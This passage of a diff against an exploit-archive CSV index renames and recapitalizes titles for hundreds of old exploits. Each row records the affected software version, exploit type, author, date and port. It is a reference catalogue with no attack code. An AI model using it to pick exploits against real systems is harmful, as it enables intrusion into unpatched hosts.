Format Strings Exploit",2001-01-03,kalou,solaris,remote,21 240,platforms/solaris/dos/240.sh,"Solaris 2.6 / 7 / 8 Lock Users Out of mailx Exploit",2001-01-03,Optyx,solaris,dos,0 -241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 +241,platforms/linux/dos/241.c,"ProFTPD 1.2.0 (rc2) - memory leakage example Exploit",2001-01-03,"Piotr Zurawski",linux,dos,21 242,platforms/cgi/webapps/242.pl,"Fastgraf's whois.cgi Remote Command Execution Exploit",2001-01-12,"Marco van Berkum",cgi,webapps,0 243,platforms/bsd/local/243.c,"BSD chpass (pw_error(3)) Local Root Exploit",2001-01-12,caddis,bsd,local,0 244,platforms/linux/dos/244.java,"ProFTPD <= 1.2.0pre10 Remote Denial of Service Exploit",2001-01-12,JeT-Li,linux,dos,21 245,platforms/hp-ux/local/245.c,"HP-UX 11.0 /bin/cu Privilege Escalation Exploit",2001-01-13,zorgon,hp-ux,local,0 247,platforms/solaris/local/247.c,"Solaris 2.5 / 2.5.1 getgrnam() Local Overflow Exploit",2001-01-13,"Pablo Sor",solaris,local,0 -249,platforms/linux/local/249.c,"GLIBC locale format strings exploit",2003-01-15,logikal,linux,local,0 +249,platforms/linux/local/249.c,"GLIBC locale format strings Exploit",2003-01-15,logikal,linux,local,0 250,platforms/solaris/local/250.c,"Solaris 7 / 8-beta arp Local Overflow Exploit",2001-01-15,ahmed,solaris,local,0 251,platforms/linux/dos/251.c,"APC UPS 3.7.2 (apcupsd) Local Denial of Service Exploit",2001-01-15,"the itch",linux,dos,0 252,platforms/linux/local/252.pl,"Seyon 2.1 rev. 4b i586-Linux Exploit",2001-01-15,teleh0r,linux,local,0 @@ -242,7 +242,7 @@ id,file,description,date,author,platform,type,port 255,platforms/linux/local/255.pl,"Redhat 6.1 man Local Exploit (egid 15)",2001-01-19,teleh0r,linux,local,0 256,platforms/solaris/local/256.c,"Solaris 2.6 / 2.7 /usr/bin/write Local Overflow Exploit",2001-01-25,"Pablo Sor",solaris,local,0 257,platforms/linux/local/257.pl,"jaZip 0.32-2 Local Buffer Overflow Exploit",2001-01-25,teleh0r,linux,local,0 -258,platforms/linux/local/258.sh,"glibc-2.2 and openssh-2.3.0p1 exploits glibc <= 2.1.9x",2001-01-25,krochos,linux,local,0 +258,platforms/linux/local/258.sh,"glibc-2.2 and openssh-2.3.0p1 Exploits glibc <= 2.1.9x",2001-01-25,krochos,linux,local,0 259,platforms/tru64/local/259.c,"Tru64 5 (su) Env Local Stack Overflow Exploit",2001-01-26,K2,tru64,local,0 260,platforms/linux/local/260.c,"splitvt < 1.6.5 - Local Exploit",2001-01-26,"Michel Kaempf",linux,local,0 261,platforms/sco/local/261.c,"SCO OpenServer 5.0.5 Env Local Stack Overflow Exploit",2001-01-26,K2,sco,local,0 @@ -256,18 +256,18 @@ id,file,description,date,author,platform,type,port 270,platforms/irix/local/270.sh,"IRIX (5.3/6.2/6.3/6.4/6.5/6.5.11) /usr/lib/print/netprint Local Exploit",2001-05-08,LSD-PLaNET,irix,local,0 271,platforms/windows/local/271.c,"Microsoft Windows Utility Manager Local SYSTEM Exploit (MS04-011)",2004-04-15,"Cesar Cerrudo",windows,local,0 272,platforms/windows/local/272.c,"WinZIP MIME Parsing Overflow Proof of Concept Exploit",2004-04-15,snooq,windows,local,0 -273,platforms/linux/local/273.c,"SquirrelMail chpasswd buffer overflow",2004-04-20,x314,linux,local,0 +273,platforms/linux/local/273.c,"SquirrelMail chpasswd Buffer overflow",2004-04-20,x314,linux,local,0 274,platforms/linux/dos/274.c,"Linux Kernel <= 2.6.3 - (setsockopt) Local Denial of Service Exploit",2004-04-21,"Julien Tinnes",linux,dos,0 275,platforms/windows/remote/275.c,"Microsoft Windows IIS 5.0 - SSL Remote Buffer Overflow Exploit (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 276,platforms/windows/dos/276.delphi,"Microsoft Windows 2000/XP - TCP Connection Reset Remote Attack Tool",2004-04-22,Aphex,windows,dos,0 -277,platforms/linux/remote/277.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 +277,platforms/linux/remote/277.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit",2001-03-01,Gneisenau,linux,remote,53 279,platforms/linux/remote/279.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (2)",2001-03-01,LSD-PLaNET,linux,remote,53 -280,platforms/solaris/remote/280.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 +280,platforms/solaris/remote/280.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 281,platforms/tru64/local/281.c,"Tru64 UNIX 4.0g /usr/bin/at Local Root Exploit",2001-03-02,"Cody Tubbs",tru64,local,0 -282,platforms/linux/remote/282.c,"BIND 8.2.x (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 +282,platforms/linux/remote/282.c,"BIND 8.2.x - (TSIG) Remote Root Stack Overflow Exploit (4)",2001-03-02,multiple,linux,remote,53 284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - (lsub) Remote Exploit",2001-03-03,SkyLaZarT,linux,remote,143 285,platforms/linux/local/285.c,"Slackware 7.1 /usr/bin/mail Local Exploit",2001-03-03,kengz,linux,local,0 -286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 ports package xklock local root exploit",2001-03-03,dethy,bsd,local,0 +286,platforms/bsd/local/286.c,"FreeBSD 3.5.1/4.2 ports package xklock local root Exploit",2001-03-03,dethy,bsd,local,0 287,platforms/bsd/local/287.c,"FreeBSD 3.5.1/4.2 Ports Package elvrec Local Root Exploit",2001-03-03,dethy,bsd,local,0 288,platforms/multiple/local/288.c,"Progress Database Server 8.3b (prodb) Local Root Exploit",2001-03-04,"the itch",multiple,local,0 289,platforms/cgi/webapps/289.pl,"sendtemp.pl Read Access to Files",2001-03-04,"Tom Parker",cgi,webapps,0 @@ -276,28 +276,28 @@ id,file,description,date,author,platform,type,port 293,platforms/windows/remote/293.c,"Microsoft Windows - Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 (connectedNodes.ovpl) Remote Root Exploit",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows 2000/XP - Lsasrv.dll Remote Universal Exploit (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 -296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 Remote Buffer overflow Exploit",2004-05-05,vade79,linux,remote,0 +296,platforms/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow Exploit",2004-05-05,vade79,linux,remote,0 297,platforms/windows/remote/297.c,"Sasser Worm ftpd Remote Buffer Overflow Exploit (port 5554)",2004-05-16,mandragore,windows,remote,5554 298,platforms/windows/dos/298.pl,"Emule 0.42e Remote Denial of Service Exploit",2004-05-16,"Rafel Ivgi",windows,dos,80 299,platforms/windows/dos/299.c,"Symantec Multiple Firewall DNS Response Denial of Service",2004-05-16,houseofdabus,windows,dos,0 300,platforms/multiple/remote/300.c,"CVS Remote Entry Line Heap Overflow Root Exploit (Linux/FreeBSD)",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS Remote Entry Line Root Heap Overflow Exploit",2004-06-25,N/A,solaris,remote,2401 302,platforms/unix/local/302.c,"UNIX 7th Edition /bin/mkdir Local Buffer Overflow Exploit",2004-06-25,N/A,unix,local,0 -303,platforms/linux/remote/303.pl,"Borland Interbase <= 7.x Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 +303,platforms/linux/remote/303.pl,"Borland Interbase <= 7.x - Remote Exploit",2004-06-25,"Aviram Jenik",linux,remote,3050 304,platforms/linux/remote/304.c,"Subversion 1.0.2 - svn_time_from_cstring() Remote Exploit",2004-06-25,"Gyan Chawdhary",linux,remote,3690 306,platforms/linux/dos/306.c,"Linux Kernel 2.4.x - 2.6.x - Assembler Inline Function Local DoS Exploit",2004-06-25,lorenzo,linux,dos,0 307,platforms/linux/remote/307.py,"rlpr <= 2.04 msg() Remote Format String Exploit",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer <= 1.0pre4 GUI filename handling Overflow Exploit",2004-07-04,c0ntex,linux,remote,0 -309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code injection Exploit",2004-07-04,"Nasir Simbolon",php,webapps,0 -310,platforms/windows/remote/310.txt,"MS Internet Explorer Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 +309,platforms/php/webapps/309.c,"phpMyAdmin 2.5.7 - Remote code Injection Exploit",2004-07-04,"Nasir Simbolon",php,webapps,0 +310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer Remote Application.Shell Exploit",2004-07-09,Jelmer,windows,remote,0 311,platforms/multiple/remote/311.pl,"MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit",2004-07-10,"Eli Kara",multiple,remote,3306 312,platforms/windows/dos/312.txt,"Norton AntiVirus Denial of Service Vulnerability",2004-07-12,"Bipin Gautam",windows,dos,0 -313,platforms/windows/remote/313.txt,"MS Outlook Express Window Opener Vulnerability",2004-07-13,N/A,windows,remote,0 -315,platforms/windows/remote/315.txt,"MS Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0 -316,platforms/windows/remote/316.txt,"MS Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 +313,platforms/windows/remote/313.txt,"Microsoft Outlook Express Window Opener Vulnerability",2004-07-13,N/A,windows,remote,0 +315,platforms/windows/remote/315.txt,"Microsoft Outlook Express Javascript Execution Vulnerability",2004-07-13,N/A,windows,remote,0 +316,platforms/windows/remote/316.txt,"Microsoft Internet Explorer Remote Wscript.Shell Exploit",2004-07-13,"Ferruh Mavituna",windows,remote,0 317,platforms/linux/local/317.txt,"Resolv+ (RESOLV_HOST_CONF) - Linux Library Local Exploit",1996-01-01,"Jared Mauch",linux,local,0 319,platforms/linux/local/319.c,"sudo.bin NLSPATH Local Root Exploit",1996-02-13,_Phantom_,linux,local,0 -320,platforms/linux/local/320.pl,"suid_perl 5.001 vulnerability",1996-06-01,"Jon Lewis",linux,local,0 +320,platforms/linux/local/320.pl,"suid_perl 5.001 Vulnerability",1996-06-01,"Jon Lewis",linux,local,0 321,platforms/multiple/local/321.c,"BSD & Linux - umount Local Root Exploit",1996-08-13,bloodmask,multiple,local,0 322,platforms/linux/local/322.c,"Xt Library Local Root Command Execution Exploit",1996-08-24,"b0z0 bra1n",linux,local,0 324,platforms/windows/dos/324.txt,"Ping of Death Remote Denial of Service Exploit",1996-10-21,N/A,windows,dos,0 @@ -305,7 +305,7 @@ id,file,description,date,author,platform,type,port 328,platforms/solaris/local/328.c,"Solaris 2.4 /bin/fdformat Local Buffer Overflow Exploits",1997-03-23,"Cristian Schipor",solaris,local,0 329,platforms/windows/dos/329.txt,"Microsoft Windows NT Crash with an Extra Long Username DoS Exploit",1997-04-01,Fyodor,windows,dos,0 330,platforms/solaris/local/330.sh,"Solaris 2.5.1 lp and lpsched Symlink Vulnerabilities",1997-05-03,"Chris Sheldon",solaris,local,0 -331,platforms/linux/local/331.c,"LibXt XtAppInitialize() overflow *xterm exploit",1997-05-14,"Ming Zhang",linux,local,0 +331,platforms/linux/local/331.c,"LibXt XtAppInitialize() Overflow *xterm Exploit",1997-05-14,"Ming Zhang",linux,local,0 332,platforms/solaris/local/332.sh,"Solaris 2.5.0/2.5.1 ps & chkey Data Buffer Exploit",1997-05-19,"Joe Zbiciak",solaris,local,0 333,platforms/aix/local/333.c,"AIX 4.2 /usr/dt/bin/dtterm Local Buffer Overflow Exploit",1997-05-27,"Georgi Guninski",aix,local,0 334,platforms/irix/local/334.c,"IRIX Multiple Buffer Overflow Exploits (LsD)",1997-05-25,LSD-PLaNET,irix,local,0 @@ -326,7 +326,7 @@ id,file,description,date,author,platform,type,port 351,platforms/windows/local/351.c,"Microsoft Windows 2000 - POSIX Subsystem Privilege Escalation Exploit (MS04-020)",2004-07-17,bkbll,windows,local,0 352,platforms/windows/local/352.c,"Microsoft Windows 2000 - Universal Language Utility Manager Exploit (MS04-019)",2004-07-17,kralor,windows,local,0 353,platforms/windows/local/353.c,"Microsoft Windows 2000/XP - Task Scheduler .job Exploit (MS04-022)",2004-07-18,N/A,windows,local,0 -354,platforms/windows/dos/354.html,"MS Internet Explorer Overly Trusted Location Cache Exploit",2004-07-18,N/A,windows,dos,0 +354,platforms/windows/dos/354.html,"Microsoft Internet Explorer Overly Trusted Location Cache Exploit",2004-07-18,N/A,windows,dos,0 355,platforms/windows/local/355.c,"Microsoft Windows 2000 - Utility Manager (All-In-One) Exploit (MS04-019)",2004-07-20,kralor,windows,local,0 356,platforms/windows/dos/356.c,"OverByte ICS FTP Server Remote Denial of Service Exploit",2004-07-20,ATmaCA,windows,dos,0 357,platforms/windows/dos/357.c,"Medal of Honor Remote Buffer Overflow Vulnerability",2004-07-20,"Luigi Auriemma",windows,dos,0 @@ -337,7 +337,7 @@ id,file,description,date,author,platform,type,port 362,platforms/windows/dos/362.sh,"Xitami Web Server Denial of Service Exploit",2004-07-22,CoolICE,windows,dos,0 363,platforms/hardware/dos/363.txt,"Conceptronic CADSLR1 Router Denial of Service Vulnerability",2004-07-22,"Seth Alan Woolley",hardware,dos,0 364,platforms/linux/remote/364.pl,"Samba <= 3.0.4 SWAT Authorization Buffer Overflow Exploit",2004-07-22,"Noam Rathaus",linux,remote,901 -365,platforms/windows/dos/365.html,"MS Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 +365,platforms/windows/dos/365.html,"Microsoft Internet Explorer (11 bytes) Denial of Service Exploit",2004-07-23,Phuong,windows,dos,0 366,platforms/windows/dos/366.pl,"Microsoft Windows SMS 2.0 - Denial of Service Exploit",2004-07-24,MacDefender,windows,dos,0 367,platforms/osx/local/367.txt,"Mac OS X Panther Internet Connect Local Root Exploit",2004-07-28,B-r00t,osx,local,0 368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0 @@ -348,7 +348,7 @@ id,file,description,date,author,platform,type,port 373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21 374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0 375,platforms/linux/local/375.c,"Linux Kernel File Offset Pointer Handling Memory Disclosure Exploit",2004-08-04,"Paul Starzetz",linux,local,0 -376,platforms/windows/dos/376.html,"MS Internet Explorer Remote Null Pointer Crash (mshtml.dll)",2004-08-04,N/A,windows,dos,0 +376,platforms/windows/dos/376.html,"Microsoft Internet Explorer Remote Null Pointer Crash (mshtml.dll)",2004-08-04,N/A,windows,dos,0 378,platforms/windows/remote/378.pl,"BlackJumboDog Remote Buffer Overflow Exploit",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac Remote Arbitrary Code Execution Exploit",2004-08-06,N/A,linux,remote,0 380,platforms/linux/remote/380.c,"Pavuk Digest Authentication Buffer Overflow Remote Exploit",2004-08-08,infamous41md,linux,remote,80 @@ -356,12 +356,12 @@ id,file,description,date,author,platform,type,port 382,platforms/linux/remote/382.c,"Melange Chat Server 1.10 Remote Buffer Overflow Exploit",2002-12-24,innerphobia,linux,remote,0 383,platforms/multiple/dos/383.c,"psyBNC <= 2.3 - Denial of Service Exploit",2002-05-19,"Lunar Fault",multiple,dos,31337 384,platforms/php/webapps/384.txt,"PHP (php-exec-dir) Patch Command Access Restriction Bypass",2004-08-08,VeNoMouS,php,webapps,0 -385,platforms/windows/dos/385.c,"MS Messenger Denial of Service Exploit (MS03-043) (linux ver)",2004-08-08,VeNoMouS,windows,dos,0 +385,platforms/windows/dos/385.c,"Microsoft Messenger Denial of Service Exploit (MS03-043) (linux ver)",2004-08-08,VeNoMouS,windows,dos,0 386,platforms/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow Exploit",2004-08-09,c0ntex,linux,remote,80 -387,platforms/linux/remote/387.c,"Dropbear SSH <= 0.34 Remote Root Exploit",2004-08-09,livenn,linux,remote,22 +387,platforms/linux/remote/387.c,"Dropbear SSH <= 0.34 - Remote Root Exploit",2004-08-09,livenn,linux,remote,22 388,platforms/windows/local/388.c,"Ollydbg <= 1.10 Format String Bug",2004-08-10,"Ahmet Cihan",windows,local,0 389,platforms/linux/remote/389.c,"LibPNG Graphics Library Remote Buffer Overflow Exploit",2004-08-11,infamous41md,linux,remote,0 -390,platforms/linux/remote/390.c,"GV PostScript Viewer Remote Buffer overflow Exploit",2004-08-13,infamous41md,linux,remote,0 +390,platforms/linux/remote/390.c,"GV PostScript Viewer Remote Buffer Overflow Exploit",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401 393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0 @@ -371,7 +371,7 @@ id,file,description,date,author,platform,type,port 397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync <= 2.5.1 - Remote Exploit",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync <= 2.5.1 - Remote Exploit (2)",2002-01-01,Teso,linux,remote,873 -400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0 +400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow Exploit (2)",2004-08-18,infamous41md,linux,remote,0 401,platforms/windows/local/401.c,"IPSwitch IMail Server <= 8.1 - Local Password Decryption Utility",2004-08-18,Adik,windows,local,0 403,platforms/windows/local/403.c,"IPD (Integrity Protection Driver) Local Exploit",2004-08-18,N/A,windows,local,0 404,platforms/linux/remote/404.pl,"PlaySMS <= 0.7 - SQL Injection Exploit",2004-08-19,"Noam Rathaus",linux,remote,0 @@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port 434,platforms/linux/local/434.sh,"CDRDAO Local Root Exploit",2004-09-07,"Karol Wiêsek",linux,local,0 435,platforms/windows/remote/435.c,"Trillian 0.74i Remote Buffer Overflow Exploit (MSN Module Bug)",2004-09-08,Komrade,windows,remote,0 436,platforms/php/webapps/436.txt,"PHP-Nuke 7.4 - Remote Privilege Escalation",2004-09-08,mantra,php,webapps,0 -437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 Remote USER Directive Exploit (Private Version)",2004-09-09,Nebunu,linux,remote,504 +437,platforms/linux/remote/437.c,"Citadel/UX <= 6.23 - Remote USER Directive Exploit (Private Version)",2004-09-09,Nebunu,linux,remote,504 438,platforms/linux/local/438.c,"cdrecord $RSH exec() SUID Shell Creation",2004-09-11,I)ruid,linux,local,0 439,platforms/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow Exploit",2004-09-12,Delikon,windows,remote,21 463,platforms/windows/dos/463.c,"Serv-U < 5.2 - Remote Denial of Service Exploit",2004-09-13,str0ke,windows,dos,0 @@ -432,12 +432,12 @@ id,file,description,date,author,platform,type,port 561,platforms/php/webapps/561.sh,"Serendipity 0.7-beta1 SQL Injection Proof of Concept",2004-09-28,aCiDBiTS,php,webapps,0 562,platforms/windows/dos/562.c,"MSSQL 7.0 - Remote Denial of Service Exploit",2004-09-29,"securma massine",windows,dos,0 565,platforms/php/webapps/565.txt,"Silent Storm Portal Multiple Vulnerabilities",2004-09-30,"CHT Security Research",php,webapps,0 -566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 Remote Buffer Overflow Exploit",2004-10-04,LoWNOISE,windows,remote,80 -568,platforms/windows/remote/568.c,"Icecast <= 2.0.1 Win32 Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 +566,platforms/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow Exploit",2004-10-04,LoWNOISE,windows,remote,80 +568,platforms/windows/remote/568.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit",2004-10-06,Delikon,windows,remote,8000 570,platforms/php/webapps/570.txt,"WordPress Blog HTTP Splitting Vulnerability",2004-10-10,"Tenable NS",php,webapps,0 571,platforms/windows/dos/571.c,"Monolith Games Local Buffer Overflow Exploit",2004-10-10,"Luigi Auriemma",windows,dos,0 572,platforms/windows/remote/572.pl,"Eudora 6.2.0.7 Attachment Spoofer Exploit",2004-10-11,"Paul Szabo",windows,remote,0 -573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 +573,platforms/windows/remote/573.c,"Icecast <= 2.0.1 Win32 - Remote Code Execution Exploit (modded)",2004-10-12,K-C0d3r,windows,remote,8000 574,platforms/php/webapps/574.txt,"ocPortal 1.0.3 - Remote File Inclusion",2004-10-13,Exoduks,php,webapps,0 577,platforms/windows/remote/577.c,"YahooPOPs <= 1.6 SMTP Port Buffer Overflow Exploit",2004-10-15,class101,windows,remote,25 578,platforms/windows/dos/578.pl,"Microsoft Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036)",2004-10-16,"Lucas Lavarello",windows,dos,0 @@ -455,7 +455,7 @@ id,file,description,date,author,platform,type,port 590,platforms/windows/remote/590.c,"ShixxNote 6.net Remote Buffer Overflow Exploit",2004-10-22,class101,windows,remote,2000 591,platforms/linux/local/591.c,"socat <= 1.4.0.2 - Local Format String Exploit (not setuid)",2004-10-23,CoKi,linux,local,0 592,platforms/windows/remote/592.py,"Ability Server <= 2.34 (APPE) Remote Buffer Overflow Exploit",2004-10-23,KaGra,windows,remote,21 -593,platforms/windows/dos/593.pl,"Quick 'n EasY VER 2.4 Ftp Server remote D.o.S",2004-10-24,KaGra,windows,dos,0 +593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server remote DoS",2004-10-24,KaGra,windows,dos,0 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25 599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0 @@ -463,21 +463,21 @@ id,file,description,date,author,platform,type,port 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0 603,platforms/windows/dos/603.c,"Master of Orion III <= 1.2.5 - Denial of Service Exploit",2004-10-27,"Luigi Auriemma",windows,dos,0 -604,platforms/windows/dos/604.c,"Age of Sail II <= 1.04.151 Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 -605,platforms/windows/dos/605.c,"Alpha Black Zero <= 1.04 Remote Denial of Service Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 +604,platforms/windows/dos/604.c,"Age of Sail II <= 1.04.151 - Remote Buffer Overflow Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 +605,platforms/windows/dos/605.c,"Alpha Black Zero <= 1.04 - Remote Denial of Service Exploit",2004-03-03,"Luigi Auriemma",windows,dos,0 606,platforms/windows/dos/606.c,"Chatman <= 1.5.1 RC1 Broadcast Crash Exploit",2004-03-01,"Luigi Auriemma",windows,dos,0 607,platforms/windows/dos/607.c,"Flash Messaging <= 5.2.0g Remote Denial of Service Exploit",2004-03-02,"Luigi Auriemma",windows,dos,0 608,platforms/linux/remote/608.c,"WvTFTPd 0.9 - Remote Root Heap Overflow Exploit",2004-10-28,infamous41md,linux,remote,69 609,platforms/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Execution PoC Exploits",2004-10-28,infamous41md,linux,remote,0 -611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 -612,platforms/windows/remote/612.html,"MS Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 +611,platforms/windows/dos/611.c,"chesapeake tftp server 1.0 - Directory Traversal and DoS PoC Exploit",2004-11-01,"Luigi Auriemma",windows,dos,0 +612,platforms/windows/remote/612.html,"Microsoft Internet Explorer 6 - (IFRAME Tag) Buffer Overflow Exploit",2004-11-02,Skylined,windows,remote,0 616,platforms/windows/remote/616.c,"MiniShare <= 1.4.1 - Remote Buffer Overflow Exploit",2004-11-07,class101,windows,remote,80 618,platforms/windows/remote/618.c,"Ability Server 2.34 FTP STOR Buffer Overflow Exploit (Unix Exploit)",2004-11-07,NoPh0BiA,windows,remote,21 619,platforms/windows/remote/619.c,"CCProxy Log Remote Stack Overflow Exploit",2004-11-09,Ruder,windows,remote,808 620,platforms/linux/remote/620.c,"Qwik SMTP 0.3 - Remote Root Format String Exploit",2004-11-09,"Carlos Barros",linux,remote,25 621,platforms/windows/remote/621.c,"CCProxy 6.2 (ping) Remote Buffer Overflow Exploit",2004-11-10,KaGra,windows,remote,23 -623,platforms/windows/remote/623.c,"SlimFTPd <= 3.15 Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 -624,platforms/linux/local/624.c,"Linux Kernel <= 2.4.27 / 2.6.8 - binfmt_elf Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 +623,platforms/windows/remote/623.c,"SlimFTPd <= 3.15 - Remote Buffer Overflow Exploit",2004-11-10,class101,windows,remote,21 +624,platforms/linux/local/624.c,"Linux Kernel <= 2.4.27 / 2.6.8 - binfmt_elf Executable File Read Exploit",2004-11-10,"Paul Starzetz",linux,local,0 625,platforms/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service Exploit",2004-11-11,KaGra,windows,dos,0 626,platforms/windows/dos/626.c,"Kerio Personal Firewall <= 4.1.1 - Multiple IP Options DoS Exploit",2004-11-12,houseofdabus,windows,dos,0 627,platforms/windows/remote/627.pl,"IPSwitch IMail 8.13 (DELETE) Remote Stack Overflow Exploit",2004-11-12,Zatlander,windows,remote,143 @@ -488,10 +488,10 @@ id,file,description,date,author,platform,type,port 634,platforms/windows/dos/634.pl,"Secure Network Messenger <= 1.4.2 - Denial of Service Exploit",2004-11-15,ClearScreen,windows,dos,0 635,platforms/php/webapps/635.txt,"miniBB - Input Validation Hole ('user')",2004-11-16,N/A,php,webapps,0 636,platforms/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow Exploit (c source)",2004-11-16,NoPh0BiA,windows,remote,80 -637,platforms/windows/remote/637.c,"MailCarrier 2.51 Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 +637,platforms/windows/remote/637.c,"MailCarrier 2.51 - Remote Buffer Overflow Exploit",2004-11-16,NoPh0BiA,windows,remote,25 638,platforms/windows/remote/638.py,"SLMail 5.5 - POP3 PASS Buffer Overflow Exploit",2004-11-18,muts,windows,remote,110 640,platforms/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders Exploit (MS04-034)",2004-11-19,tarako,windows,remote,0 -641,platforms/windows/remote/641.txt,"MS Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 +641,platforms/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote,0 642,platforms/cgi/webapps/642.pl,"TWiki 20030201 search.pm Remote Command Execution Exploit",2004-11-20,RoMaNSoFt,cgi,webapps,0 643,platforms/windows/remote/643.c,"SLMail 5.5 - POP3 PASS Remote Buffer Overflow Exploit",2004-12-21,"Haroon Rashid Astwat",windows,remote,0 644,platforms/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Buffer Overflow Exploit",2004-11-21,"Reed Arvin",windows,remote,110 @@ -507,7 +507,7 @@ id,file,description,date,author,platform,type,port 654,platforms/windows/remote/654.c,"Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0 655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0 657,platforms/linux/local/657.c,"atari800 Local Root Exploit",2004-11-25,pi3,linux,local,0 -658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 +658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143 